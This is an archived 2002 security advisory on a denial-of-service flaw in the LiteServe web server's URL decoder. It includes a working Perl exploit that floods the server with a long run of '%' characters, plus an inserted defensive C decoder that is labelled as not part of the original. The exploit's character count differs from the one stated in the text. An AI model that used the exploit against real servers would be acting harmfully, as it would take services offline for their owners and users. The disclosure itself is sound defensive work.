[NT] LiteServe URL Decoding DoS

From: support@securiteam.com
Date: 11/18/02

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Nov 2002 10:20:30 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      LiteServe URL Decoding DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.cmfperception.com/> LiteServe is a powerful, full-featured
    Web, email and FTP server. This server software is perfect for personal
    websites or commercial sites with high traffic demands and multiple
    domains. A vulnerability in the way the program decodes URLs allows remote
    attackers to cause it to crash.

    DETAILS

    LiteServe's URL decoder has a problem handling illegal "%xx" sequences,
    such as "%.@", and may produce corrupted output when such a sequence is
    used. The problem appears to be a referencing issue when the decode
    sequence does not specify a legitimate hexadecimal sequence. A denial of
    service may occur if LiteServe is passed an extremely large request
    consisting only of "%" characters. 290,259 such characters will cause
    LiteServe to freeze:

    GET /[buffer] HTTP/1.0

    After this request is processed, attempting to connect to the HTTP service
    reveals that the server is dead.
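    As an added, defender-side example (not part of this advisory and not
    LiteServe's code): a strict percent-decoder in C that rejects malformed
    "%xx" sequences such as "%.@" and never reads past the end of its input,
    so a request path made only of "%" characters is refused rather than
    decoded into garbage. The function names, the sample paths and the
    constructed run of "%" characters are assumptions made for this
    illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Decode one hex digit; return -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Strict percent-decoder. Every '%' must be followed by exactly two hex
 * digits that lie inside the input buffer; anything else is rejected
 * instead of being read past the end of the buffer or decoded to garbage.
 * Returns 0 on success (out is NUL-terminated, *out_len set) or -1 on a
 * malformed sequence or insufficient output space.
 */
int url_decode_strict(const char *in, size_t in_len,
                      char *out, size_t out_cap, size_t *out_len)
{
    size_t i = 0, o = 0;
    while (i < in_len) {
        unsigned char c = (unsigned char)in[i];
        if (c == '%') {
            /* Bounds check first: a trailing "%" or "%4" has no two digits. */
            if (in_len - i < 3) return -1;
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hexval((unsigned char)in[i + 2]);
            if (hi < 0 || lo < 0) return -1;   /* e.g. "%.@" */
            c = (unsigned char)(hi * 16 + lo);
            i += 3;
        } else {
            i += 1;
        }
        if (o + 1 >= out_cap) return -1;       /* leave room for the NUL */
        out[o++] = (char)c;
    }
    out[o] = '\0';
    if (out_len) *out_len = o;
    return 0;
}

/* Decode a NUL-terminated string into a heap buffer; NULL if malformed.
 * The decoded form is never longer than the input. Caller frees the result. */
char *url_decode_dup(const char *in)
{
    size_t in_len = strlen(in);
    char *out = malloc(in_len + 1);
    if (!out) return NULL;
    size_t n;
    if (url_decode_strict(in, in_len, out, in_len + 1, &n) != 0) {
        free(out);
        return NULL;
    }
    return out;
}

/* 1 if `in` decodes exactly to `expected`, 0 if rejected or different. */
int decode_matches(const char *in, const char *expected)
{
    char *d = url_decode_dup(in);
    int ok = (d != NULL && strcmp(d, expected) == 0);
    free(d);
    return ok;
}

/* 1 if the decoder refuses `in`, 0 if it accepts it. */
int decode_rejected(const char *in)
{
    char *d = url_decode_dup(in);
    int rejected = (d == NULL);
    free(d);
    return rejected;
}

/* Feed the decoder a path of n '%' characters (constructed here, the shape
 * of the request in the advisory) and report whether it was rejected. */
int percent_run_rejected(size_t n)
{
    char *path = malloc(n + 1);
    if (!path) return -1;
    memset(path, '%', n);
    path[n] = '\0';
    int rejected = decode_rejected(path);
    free(path);
    return rejected;
}

int main(void)
{
    const char *samples[] = { "/index.html", "/a%20b", "/%41%42",
                              "%.@", "/x%4", "/y%" };
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++) {
        char *d = url_decode_dup(samples[k]);
        printf("%-12s -> %s\n", samples[k], d ? d : "REJECTED");
        free(d);
    }
    printf("290259 x '%%' -> %s\n",
           percent_run_rejected(290259) ? "REJECTED" : "accepted");
    return 0;
}
```

    The two checks that matter are the `in_len - i < 3` test before any
    lookahead and the `hexval` validation of both digits; the advisory's
    "%.@" fails the second and a path that ends in a lone "%" fails the
    first. A server would normally pair this with a cap on the request
    target length enforced before decoding, so an oversized path is
    refused without ever being scanned.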

    Exploit:
    #!/usr/bin/perl
    # Arguments: host port. Sends one request whose path is a run of "%".
    use strict;
    use warnings;
    use IO::Socket;
    my $buffer = "%" x 290759;
    # The oversized path is passed as the argument that fills "%s".
    my $req = sprintf("GET /%s HTTP/1.0\r\n\r\n", $buffer);
    my $f = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1],
                                  Proto => "tcp")
        or die "connect failed: $@";
    print $f $req;
    close $f;

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mattmurphy@kc.rr.com>
    Matthew Murphy.

